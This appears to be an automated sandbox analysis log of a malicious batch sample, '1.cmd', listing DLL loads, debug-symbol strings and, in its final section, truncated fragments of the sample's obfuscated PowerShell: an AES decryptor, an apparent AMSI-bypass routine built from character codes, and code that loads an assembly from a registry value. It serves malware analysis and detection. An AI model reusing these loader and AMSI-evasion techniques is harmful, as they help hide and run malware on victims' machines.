Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\lsass.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: loadperf.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\wbem\WMIADAP.exe | File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 1.cmd | Static file information: File size 5214429 > 1048576
Source: Binary string: System.Configuration.Install.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Drawing.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdbMZ source: WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Numerics.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ServiceProcess.pdbame="P@ source: WER3551.tmp.dmp.28.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.Install.pdb( source: WER3551.tmp.dmp.28.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Xml.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.pdbP source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.pdbP4 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Configuration.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Xml.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000002.2998816420.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ServiceProcess.pdb source: WER604E.tmp.dmp.10.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Data.pdbH source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ServiceProcess.ni.pdbRSDSwg source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Windows.Forms.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.pdbp^y source: WER3551.tmp.dmp.28.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Drawing.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.pdb3 source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Transactions.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.pdbiy source: WER3551.tmp.dmp.28.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Transactions.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Numerics.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: function Rgueq($eXEDy){$HKJEc=[System.Security.Cryptography.Aes]::Create();$HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Powershell logging: DetailSequence=1DetailTotal=1SequenceNumber=27UserId=WORKGROUP\SYSTEMHostName=ConsoleHostHostVersion=5.1.19041.1682HostId=fa30d40e-d0d2-4405-85db-7bb3a1a8c1b8HostApplication=C:\Windows\System32\Window
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer($PWtaGkrbiCHSQK,$crUBwWNbWsKMjsxdFIT).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$SjReXwPFwLrQCguSY=$AmujSZCroNXavL.Invo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](114)+''+[Char](98)+''+[Char](120)+''+[Char](
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 